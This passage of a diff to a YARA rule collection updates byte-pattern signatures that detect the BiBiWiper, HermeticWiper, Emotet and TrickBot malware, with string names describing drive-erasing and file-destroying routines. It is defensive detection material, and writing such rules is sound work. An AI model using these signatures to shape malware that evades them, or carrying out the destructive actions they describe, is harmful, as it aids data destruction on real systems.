-            ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 5C C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8B 4D
-            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? 00 00 00 00
-            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 64
-            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 73
-            C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6C
-            C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 41 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6B
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 72
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 33
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 32 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 2E
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 00
-            C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8
+		$resolve_api_wrapper_3 = {
+            55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74
+            ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ??
+            85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2
         }
-		$erase_drives_recursively_2_p1 = {
-            8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E1 ?? 0F 84 ?? ?? ?? ?? 0F BE 95 ??
-            ?? ?? ?? 83 FA ?? 75 ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 0F BE 8D ?? ?? ?? ?? 83 F9
-            ?? 75 ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 75 ?? 8B 85 ?? ?? ?? ?? 83 E0 ??
-            74 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 95 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+		$resolve_api_wrapper_4 = {
+            55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56
+            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0
+            74 ?? 5E 89 45 ?? 5D E9
         }
-		$erase_drives_recursively_2_p2 = {
-            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? E9 ??
-            ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
-            ?? ?? ?? 73 ?? E9 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? FF 95 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
-            51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 55 ?? 8D 8D ?? ?? ??
-            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 50 FF 95 ?? ?? ?? ?? 8B E5 5D C3
+		$find_first_file_snippet_1 = {
+            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ??
+            52 53 51 FF D0
+        }
+		$find_first_file_snippet_2 = {
+            57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA
+            8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1
+        }
+		$find_first_file_snippet_3 = {
+            53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
+            38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53
+            53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
+        }
+		$find_first_file_snippet_4 = {
+            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D
+            5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A
+            ?? 8D 56 ?? 52 53 51 CC C3
+        }
+		$find_first_file_snippet_5 = {
+            56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50
+            50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $destroy_if_not_controller ) and ( $erase_drive_data ) and ( all of ( $erase_drives_recursively_* ) )
+		uint16( 0 ) == 0x5A4D and ( any of ( $resolve_api_wrapper_* ) and any of ( $find_first_file_snippet_* ) )
+}
+rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects BiBiWiper trojan."
+		author = "ReversingLabs"
+		id = "c370dde0-71ff-5832-b131-6d61beb02b9b"
+		date = "2023-11-28"
+		modified = "2023-11-28"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Linux.Trojan.BiBiWiper.yara#L1-L76"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8f290141d5da660463dede6df571d774448e136e2993a0a4c706245464e1239e"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "BiBiWiper"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$destroy_files_p1 = {
+            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89
+            95 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 44 89 8D ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 83 C0 ?? 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 BA ?? ?? ??
+            ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 89 D0 48 C1 F8 ?? 48 89 CA 48 C1 FA ?? 48 29 D0
+            48 69 D0 ?? ?? ?? ?? 48 89 C8 48 29 D0 48 85 C0 0F 94 C0 84 C0 74 ?? E8 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89
+            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 CE 48 89 C7
+            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89
+            CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D
+            8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ??
+            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
+            89 C3 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ??
+            ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+        }
+		$destroy_files_p2 = {
+            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C1 E0 ?? 48 89 45 ?? 48 8B B5 ?? ?? ?? ?? 48 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 F7 F6 48 8B 55 ?? 48 29 D0 48 89 45 ?? 83 BD ?? ?? ?? ??
+            ?? 7E ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 48 98 48 0F AF 45 ?? BA ?? ?? ?? ?? 48 F7 B5 ??
+            ?? ?? ?? 48 89 D0 48 89 C1 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8
+            ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 39
+            85 ?? ?? ?? ?? 73 ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ??
+            48 29 D0 48 89 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 00 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45
+            ?? 48 8B 45 ?? 89 C2 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 5D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+        }
+		$destroy_files_p3 = {
+            89 C7 48 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 C2 48
+            8B 45 ?? 48 01 D0 48 39 85 ?? ?? ?? ?? 73 ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 29
+            D0 48 8B 55 ?? 48 29 D0 48 89 45 ?? 48 83 7D ?? ?? 7E ?? 48 8B 4D ?? 48 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 48 98 48
+            39 85 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? EB ?? 90 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 83 FB ?? E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89
+            C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48
+            89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ??
+            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 8B 5D ?? C9 C3
+        }
+
+	condition:
+		uint32( 0 ) == 0x464C457F and ( all of ( $destroy_files_p* ) )
 }
 rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE
 {
@@ -56650,8 +57121,8 @@ rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE
 		date = "2021-11-16"
 		modified = "2021-11-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.Emotet.yara#L1-L182"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.Emotet.yara#L1-L182"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
 		logic_hash = "747d603c9849a66782c95050a4a634ffdb4ce2882adcfc5d63e1f1ea1651b25e"
 		score = 75
 		quality = 90
@@ -56787,18 +57258,18 @@ rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and ( $decrypt_resource_v1 and $generate_filename_v1 ) or ( $decrypt_resource_v2 and $generate_filename_v2 ) or ( $decrypt_resource_v3 and $generate_filename_v3 ) or ( $decrypt_resource_v4 and $generate_filename_snippet_v4 ) or ( $decrypt_resource_snippet_v5 and all of ( $liblzf_decompression_* ) ) or ( $decrypt_resource_snippet_v6 and all of ( $liblzf_decompression_* ) ) or ( $decrypt_resource_snippet_v7 and $state_machine_snippet_v7 )
 }
-rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects BiBiWiper trojan."
+		description = "Yara rule that detects HermeticWiper trojan."
 		author = "ReversingLabs"
-		id = "c370dde0-71ff-5832-b131-6d61beb02b9b"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "252dfb3d-9d4e-51a4-80c9-64e17922d997"
+		date = "2022-02-24"
+		modified = "2022-02-24"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Linux.Trojan.BiBiWiper.yara#L1-L76"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8f290141d5da660463dede6df571d774448e136e2993a0a4c706245464e1239e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.HermeticWiper.yara#L1-L50"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0fa519ce8285ffe4e49c2a301e8a0fd0516a05dc6b41ee0b010fdc76dd6e195e"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
@@ -56806,62 +57277,83 @@ rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
 		tc_detection_type = "Trojan"
-		tc_detection_name = "BiBiWiper"
+		tc_detection_name = "HermeticWiper"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$destroy_files_p1 = {
-            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89
-            95 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 44 89 8D ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 83 C0 ?? 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 BA ?? ?? ??
-            ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 89 D0 48 C1 F8 ?? 48 89 CA 48 C1 FA ?? 48 29 D0
-            48 69 D0 ?? ?? ?? ?? 48 89 C8 48 29 D0 48 85 C0 0F 94 C0 84 C0 74 ?? E8 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89
-            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 CE 48 89 C7
-            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89
-            CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D
-            8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ??
-            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
-            89 C3 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ??
-            ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+		$corrupt_physical_drive = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F
+            11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
+            BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ??
+            50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ??
+            75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ??
+            ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ??
+            ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90
+            8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70
+            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ??
+            ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70
+            ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89
+            4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85
+            DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ??
+            FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E
+            5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ??
+            5F 5E 5B 8B E5 5D C2
         }
-		$destroy_files_p2 = {
-            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C1 E0 ?? 48 89 45 ?? 48 8B B5 ?? ?? ?? ?? 48 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 F7 F6 48 8B 55 ?? 48 29 D0 48 89 45 ?? 83 BD ?? ?? ?? ??
-            ?? 7E ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 48 98 48 0F AF 45 ?? BA ?? ?? ?? ?? 48 F7 B5 ??
-            ?? ?? ?? 48 89 D0 48 89 C1 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8
-            ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 39
-            85 ?? ?? ?? ?? 73 ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ??
-            48 29 D0 48 89 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 00 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45
-            ?? 48 8B 45 ?? 89 C2 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 5D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $corrupt_physical_drive )
+}
+rule REVERSINGLABS_Win32_Trojan_Trickbot : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects TrickBot trojan."
+		author = "ReversingLabs"
+		id = "4ed253cc-0398-542b-a2b7-c42a0b9431fb"
+		date = "2020-07-15"
+		modified = "2020-07-15"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.TrickBot.yara#L1-L46"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
